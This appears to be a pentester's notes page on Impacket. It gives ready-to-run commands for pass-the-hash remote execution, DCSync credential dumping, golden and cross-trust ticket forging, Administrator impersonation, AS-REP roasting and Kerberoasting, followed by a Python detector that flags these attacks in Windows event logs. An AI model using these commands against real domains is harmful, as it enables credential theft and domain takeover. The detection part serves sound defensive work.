
Impacket

Impacket is a collection of Python classes for working with network protocols.

Pass the hash

We can use Impacket to authenticate with an NT hash instead of a password. The -hashes argument takes LMHASH:NTHASH, so leaving the LM part empty (":nt") passes only the NT hash.

impacket-psexec -hashes :nt incendium@corp.local 
impacket-atexec -hashes :nt incendium@corp.local whoami
impacket-smbexec -hashes :nt incendium@corp.local 
impacket-wmiexec -hashes :nt incendium@corp.local 

Dcsync attack

If you have a password:

impacket-secretsdump corp.local/incendium:Password123@10.10.110.55

With a cached ticket:

impacket-secretsdump -k -no-pass incendium@zph-svrdc01.zsm.local -target-ip 192.168.210.10 -dc-ip 192.168.210.10

Generate tickets

To forge a service ticket (TGS) from an NT hash:

impacket-ticketer -nthash <ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn>  <user_name>

Golden trust cross ticket (child-parent domains in forest)

impacket-ticketer -nthash <krbtgt-hash> -domain-sid S-1-5-21-3056178012-3972705859-382195122 -domain internal.zsm.local -extra-sid S-1-5-21-2734290894-461713716-382195122-519 -spn krbtgt/parent.local incendium

Service ticket

Impacket's getST.py requests a Service Ticket and saves it as a ccache file.

With credentials:

impacket-getST -spn www/server01.test.local -dc-ip 10.10.10.1 -impersonate Administrator test.local/john:password123

With cached ticket:

impacket-getST -k -no-pass -spn cifs/DC-01.parent.local parent.local/incendium@parent.local -dc-ip 192.168.210.10

Overpass The Hash/Pass The Key (PTK)

# With NT hash (LM part may be left empty)
impacket-getTGT <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
# With credentials
impacket-getTGT <domain_name>/<user_name>:[password]

AS-REP roasting

impacket-GetNPUsers <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

Kerberoasting

impacket-GetUserSPNs -target-domain domain.local -usersfile users.txt -dc-ip dc01.domain.local domain.local/guest -no-pass
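Added example, not part of the original notes: a small Python detector that scans Windows Security event records for the footprints the DCSync, AS-REP roasting and Kerberoasting commands above leave on a domain controller. The event IDs (4662, 4768, 4769), the replication extended-right GUIDs and the 0x17 (RC4-HMAC) encryption type are the standard values Windows logs; the JSON-lines records, account names and addresses are constructed sample data, and the "three or more service accounts from one address" threshold is an assumption to tune per environment.

```python
import json

# Extended rights that directory replication (what secretsdump's DCSync does) requires.
DS_REPLICATION_GUIDS = (
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
)
RC4_HMAC = "0x17"  # TicketEncryptionType for RC4-HMAC, the type GetNPUsers/GetUserSPNs ask for

# Constructed sample records (one Security event per JSON line), not real logs.
# 4769 ServiceName is the service account's sAMAccountName, as Windows logs it.
SAMPLE_EVENTS = """\
{"EventID": 4662, "SubjectUserName": "incendium", "ObjectName": "DC=corp,DC=local", "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}
{"EventID": 4662, "SubjectUserName": "DC02$", "ObjectName": "DC=corp,DC=local", "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}
{"EventID": 4768, "TargetUserName": "svc_backup", "PreAuthType": "0", "TicketEncryptionType": "0x17", "IpAddress": "10.10.110.99"}
{"EventID": 4768, "TargetUserName": "alice", "PreAuthType": "2", "TicketEncryptionType": "0x12", "IpAddress": "10.10.110.20"}
{"EventID": 4769, "ServiceName": "svc_sql", "TicketEncryptionType": "0x17", "IpAddress": "10.10.110.99"}
{"EventID": 4769, "ServiceName": "svc_web", "TicketEncryptionType": "0x17", "IpAddress": "10.10.110.99"}
{"EventID": 4769, "ServiceName": "svc_backup", "TicketEncryptionType": "0x17", "IpAddress": "10.10.110.99"}
{"EventID": 4769, "ServiceName": "krbtgt", "TicketEncryptionType": "0x17", "IpAddress": "10.10.110.99"}
{"EventID": 4769, "ServiceName": "FS01$", "TicketEncryptionType": "0x12", "IpAddress": "10.10.110.20"}
"""


def load_events(jsonl):
    """Parse JSON-lines event records into dicts, skipping blank lines."""
    return [json.loads(line) for line in jsonl.splitlines() if line.strip()]


def dcsync_findings(events):
    """4662 with a replication extended right used by a non-machine account."""
    out = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        props = ev.get("Properties", "").lower()
        if not any(guid in props for guid in DS_REPLICATION_GUIDS):
            continue
        user = ev.get("SubjectUserName", "")
        if user.endswith("$"):  # domain controllers replicate legitimately
            continue
        out.append(f"DCSync: {user} used replication rights on {ev.get('ObjectName')}")
    return out


def asrep_roast_findings(events):
    """4768 with PreAuthType 0 (no pre-authentication) and an RC4 ticket."""
    return [
        f"AS-REP roast: TGT without pre-auth for {ev.get('TargetUserName')} from {ev.get('IpAddress')}"
        for ev in events
        if ev.get("EventID") == 4768
        and str(ev.get("PreAuthType")) == "0"
        and ev.get("TicketEncryptionType") == RC4_HMAC
    ]


def kerberoast_findings(events, min_services=3):
    """One client address requesting RC4 service tickets for many distinct service accounts."""
    by_ip = {}
    for ev in events:
        if ev.get("EventID") != 4769 or ev.get("TicketEncryptionType") != RC4_HMAC:
            continue
        svc = ev.get("ServiceName", "")
        if svc.lower() == "krbtgt" or svc.endswith("$"):  # TGT and machine accounts are not roastable
            continue
        by_ip.setdefault(ev.get("IpAddress"), set()).add(svc)
    return [
        f"Kerberoast: {ip} requested RC4 service tickets for {len(svcs)} accounts: {sorted(svcs)}"
        for ip, svcs in sorted(by_ip.items())
        if len(svcs) >= min_services
    ]


def analyze(jsonl):
    """Run all three detections over a JSON-lines string and return the findings."""
    events = load_events(jsonl)
    return dcsync_findings(events) + asrep_roast_findings(events) + kerberoast_findings(events)


if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(finding)
```

Two caveats for using this on real telemetry: 4662 only appears when the Directory Service Access audit subcategory is enabled and the domain object carries a SACL for the replication rights, and filtering on 0x17 misses roasting attempts against accounts that only issue AES tickets, so an AES variant of the same rule (0x11/0x12 with a high request rate) is worth adding.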


Last updated 5 months ago